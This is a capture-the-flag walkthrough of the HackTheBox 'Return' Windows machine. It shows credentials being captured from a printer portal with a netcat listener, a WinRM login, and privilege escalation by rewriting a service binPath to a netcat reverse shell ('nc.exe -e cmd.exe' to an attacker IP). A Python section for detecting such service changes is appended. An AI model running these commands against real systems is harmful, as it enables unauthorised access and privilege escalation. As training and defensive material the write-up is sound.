Tuesday, October 18, 2022
Return HackTheBox Walkthrough – Hacking Articles


Return is a Windows machine on HTB rated as easy; the box is built on a Windows host with weak service permissions. In summary, we abuse a printer admin portal to capture hardcoded credentials via netcat and use them for a WinRM login. The printer service account is a member of the Server Operators group, which allows it to stop and start certain services. We therefore exploit a weakly configured service to execute our malicious exe file by abusing the Server Operators' permissions.

Table of Contents

Initial Access

  • Enumeration
  • Credential Dumping
  • WinRM Valid Account
  • User Flag

Privilege Escalation

  • Abusing Weak Service Permission
  • Root Flag

Let’s deep dive into this.

Initial Access

First, we run an Nmap scan against the machine's IP address to find the open ports. Several ports are open, and the Microsoft services tell us the target is running a Windows operating system.

nmap -sV -sC 10.129.31.219

Enumeration

Since port 80 is open, let's try to access the IP address via a browser.

As you can see, we have access to a printer admin panel. The pages are running PHP. Let's navigate to the Settings tab.

The settings page shows us the username, svc-printer, and the hardcoded password, which is masked. The Server Address field is the only field that acts as a parameter when the Update button is pressed, and the printer is communicating with the local address on port 389.

What if we replace the server address with the attacking machine's IP address, still using port 389?

Credential Dumping

Once we have replaced the server address with the attacker's IP (Kali Linux), we launch a Netcat listener on port 389 on our Kali machine.

nc -lvp 389

Once we hit the Update button, we receive the password “1edFg43012!!”.

WinRM Valid Account

Let's use evil-winrm to establish a remote connection. This can be done by issuing the command below:

evil-winrm -i 10.129.31.219 -u svc-printer -p "1edFg43012!!"

We have access to the server. Let's browse to the Desktop directory and see if we can find any flags. Indeed, as shown in the screenshot above, we find the user.txt flag.

Privilege Escalation

Now that we have access to the machine, let's verify which user permissions and group memberships we have.

To verify this, we issue the command net user svc-printer

From the screenshot below, we can see that this user is a member of the Server Operators group.

What can a user with Server Operators group membership do?

Server Operators can start and stop services.

The Server Operators group is considered a service administrator group and can change binaries that are installed on the domain controller; read more here.

upload /usr/share/windows-binaries/nc.exe

So we first upload the nc.exe Windows binary and then enumerate the installed services for further exploitation.

services

We found a list of installed services and their paths, together with true/false flags for privileges.

Abusing Weak Service Permission

Here we need to analyse which binary path we can modify to execute the nc.exe file.

First, we try to change the binary path of Windows Defender (WinDefend) but get an access denied error.

sc.exe config WinDefend binPath="C:\Users\svc-printer\Desktop\nc.exe -e cmd.exe 10.10.14.93 1234"

Then we try to modify the binary path for VMTools, and this finally works for us.

sc.exe config VMTools binPath="C:\Users\svc-printer\Desktop\nc.exe -e cmd.exe 10.10.14.93 1234"

Since svc-printer is a member of Server Operators, we can restart the service to get the reverse connection. So, let's stop and start the VMTools service by issuing the commands:

sc.exe stop VMTools
sc.exe start VMTools

Before starting the VMTools service, we make sure that netcat is listening on port 1234 as shown below.

Once the service is stopped and started again, we get a netcat session and obtain the root flag.
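From the defender's side (an added note, not part of the original walkthrough): the binPath change above is written to the service's ImagePath registry value under HKLM\System\CurrentControlSet\Services, which Sysmon logs as Event ID 13 when that key is monitored. The Python below is example detection logic, run over constructed sample records in Sysmon's field layout; it flags ImagePath changes made by non-system accounts or pointing into user-writable directories.

```python
import re

# Constructed sample records modelled on Sysmon Event ID 13 (RegistryEvent: value set).
# These are not real logs from the box; field names follow Sysmon's schema.
SAMPLE_EVENTS = [
    {"EventID": 13, "User": "RETURN\\svc-printer",
     "TargetObject": r"HKLM\System\CurrentControlSet\Services\VMTools\ImagePath",
     "Details": r"C:\Users\svc-printer\Desktop\nc.exe -e cmd.exe 10.10.14.93 1234"},
    {"EventID": 13, "User": "NT AUTHORITY\\SYSTEM",
     "TargetObject": r"HKLM\System\CurrentControlSet\Services\VMTools\ImagePath",
     "Details": r"C:\Program Files\VMware\VMware Tools\vmtoolsd.exe"},
    {"EventID": 13, "User": "RETURN\\svc-printer",
     "TargetObject": r"HKLM\System\CurrentControlSet\Services\WinDefend\Start",
     "Details": "DWORD (0x00000002)"},
]

# Only ImagePath values directly under the Services key are of interest here.
SERVICES_KEY = re.compile(
    r"^HKLM\\System\\CurrentControlSet\\Services\\([^\\]+)\\ImagePath$", re.IGNORECASE)
# Directories a low-privileged user can typically write to (assumed list, extend per environment).
WRITABLE_ROOTS = ("c:\\users\\", "c:\\windows\\temp\\", "c:\\programdata\\")
# Accounts expected to legitimately rewrite service binaries (e.g. during installs/updates).
TRUSTED_ACCOUNTS = {"nt authority\\system", "nt service\\trustedinstaller"}


def service_from_target(target):
    """Return the service name if the registry path is a service ImagePath, else None."""
    m = SERVICES_KEY.match(target)
    return m.group(1) if m else None


def image_path_is_suspicious(details):
    """True when the new ImagePath starts inside a user-writable directory."""
    lowered = details.lower().lstrip('"')
    return lowered.startswith(WRITABLE_ROOTS)


def find_suspicious_service_changes(events):
    """Scan Sysmon-style records and return one finding per suspicious ImagePath change."""
    findings = []
    for ev in events:
        if ev.get("EventID") != 13:
            continue
        svc = service_from_target(ev.get("TargetObject", ""))
        if svc is None:
            continue
        reasons = []
        if ev.get("User", "").lower() not in TRUSTED_ACCOUNTS:
            reasons.append("ImagePath changed by a non-system account")
        if image_path_is_suspicious(ev.get("Details", "")):
            reasons.append("ImagePath points into a user-writable directory")
        if reasons:
            findings.append({"service": svc, "user": ev["User"],
                             "image_path": ev["Details"], "reasons": reasons})
    return findings
```

The same logic can be pointed at Security Event 4657 records if a SACL is set on the Services key instead of Sysmon.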

Author: Tirut Hawoldar is a Cyber Security Enthusiast and CTF player with 15 years of experience in IT Security and Infrastructure. Can be contacted on LinkedIn
